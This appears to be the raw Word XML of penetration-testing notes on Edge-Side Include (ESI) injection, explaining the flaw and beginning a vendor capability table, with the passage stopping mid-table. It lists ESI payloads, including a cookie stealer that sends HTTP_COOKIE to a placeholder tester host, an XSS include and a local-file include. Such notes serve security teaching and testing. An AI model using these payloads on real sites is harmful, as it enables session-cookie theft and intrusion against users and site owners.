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C88A496" wp14:paraId="76E81119" wp14:textId="69D31DC2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Edge-Side Includes (ESI)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="6CAF1688" wp14:textId="5D5B0F0E">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="504A9FB5" wp14:textId="0A74C70C">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Edge Side Includes (ESI) is an XML-based markup language used to tackle performance issues by enabling heavy caching of Web content, which would be otherwise unstorable through traditional caching protocols. Edge Side Includes (ESI) allow for dynamic web content assembly at the edge of the network (Content Delivery Network, User's Browser, or Reverse Proxy) by instructing the page processor what needs to be done to complete page assembly through ESI element tags (XML tags).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="343DDC86" wp14:textId="6F23D95C">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ESI tags are used to instruct an HTTP surrogate (reverse-proxy, caching server, etc.) to fetch additional information regarding a web page with an already cached template. This information may come from another server before rendering the web page to the end-user. ESI enable fully cached web pages to include dynamic content.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="5C54F4CD" wp14:textId="4B494168">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Edge-Side Include Injection occurs when an attacker manages to reflect malicious ESI tags in the HTTP Response. The root cause of this vulnerability is that HTTP surrogates cannot validate the ESI tag origin. They will gladly parse and evaluate legitimate ESI tags by the upstream server and malicious ESI tags by an attacker.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="3D98DCCE" wp14:textId="58C4846A">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Although we can identify the use of ESI by inspecting response headers in search for Surrogate-Control: content="ESI/1.0", we usually need to use a blind attack approach to detect if ESI is in use or not. Specifically, we can introduce ESI tags to HTTP requests to see if any intermediary proxy is parsing the request and if ESI Injection is possible. Some useful ESI tags are:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="7600BF93" wp14:textId="567204C5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ESI Tags</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="1FB29D58" wp14:textId="7196DE36">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: html</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="15FF5371" wp14:textId="21F19301">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>// Basic detection</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;esi: include src=http://&lt;PENTESTER IP&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>// XSS Exploitation Example</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;esi: include src=http://&lt;PENTESTER IP&gt;/&lt;XSSPAYLOAD.html&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>// Cookie Stealer (bypass httpOnly flag)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;esi: include src=http://&lt;PENTESTER IP&gt;/?cookie_stealer.php?=$(HTTP_COOKIE)&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>// Introduce private local files (Not LFI per se)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;esi:include src="supersecret.txt"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>// Valid for Akamai, sends debug information in the response</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;esi:debug/&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="516DF552" wp14:textId="4CF9A17A">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>In some cases, we can achieve remote code execution when the application processing ESI directives supports XSLT, a dynamic language used to transform XML files. In that case, we can pass dca=xslt to the payload. The XML file selected will be processed with the possibility of performing XML External Entity Injection Attacks (XXE) with some limitations.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="55A5B80E" wp14:textId="6DCFBE52">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:hyperlink r:id="Ra7191c5d6243405a">
        <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>GoSecure</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> has created a table to help us understand possible attacks that we can try against different ESI-capable software, depending on the functionality supported. Let us provide some explanations regarding the column names of the below table first:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="089D6679" wp14:textId="75F8B436">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Includes: Supports the &lt;esi:includes&gt; directive</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="07913E1C" wp14:textId="64CAF4D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Vars: Supports the &lt;esi:vars&gt; directive. Useful for bypassing XSS Filters</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="6506B8F2" wp14:textId="7AD56445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Cookie: Document cookies are accessible to the ESI engine</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="7E6C6CC9" wp14:textId="5800FF84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Upstream Headers Required: Surrogate applications will not process ESI statements unless the upstream application provides the headers</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2C88A496" wp14:paraId="1B6A4914" wp14:textId="13101114">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Host Allowlist: In this case, ESI includes are only possible from allowed server hosts, making SSRF, for example, only possible against those hosts</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1502"/>
        <w:gridCol w:w="1502"/>
        <w:gridCol w:w="1502"/>
        <w:gridCol w:w="1502"/>
        <w:gridCol w:w="1502"/>
        <w:gridCol w:w="1502"/>
      </w:tblGrid>
      <w:tr w:rsidR="2C88A496" w:rsidTr="2C88A496" w14:paraId="399C5E2F">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="10ED2A28" w14:textId="2DD80B03">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="56AAC1B8" w14:textId="428EEA30">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Includes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="73CA619F" w14:textId="36324D6C">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Vars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="1E6BED05" w14:textId="29777B16">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="3C505987" w14:textId="2E9971C7">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Upstream Headers Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="52D27A4E" w14:textId="58983B6C">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="2C88A496" w:rsidR="2C88A496">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Host Whitelist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2C88A496" w:rsidTr="2C88A496" w14:paraId="303B4ED2">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="7A8C70DE" w14:textId="2BF3BA73">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Squid3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="16F999A5" w14:textId="56D04BB9">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="51EFA1A8" w14:textId="099B5567">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="5FADE676" w14:textId="1277546F">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="244F1C9A" w14:textId="44D89793">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="0C275DDA" w14:textId="71064F67">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2C88A496" w:rsidTr="2C88A496" w14:paraId="05B0CD66">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="6AEBE41F" w14:textId="781D67D2">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Varnish Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="244423CF" w14:textId="76E1D990">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="2C88A496" w:rsidP="2C88A496" w:rsidRDefault="2C88A496" w14:paraId="28FFE162" w14:textId="4B928E54">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="2C88A496">
              <w:rPr/>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcMar/>
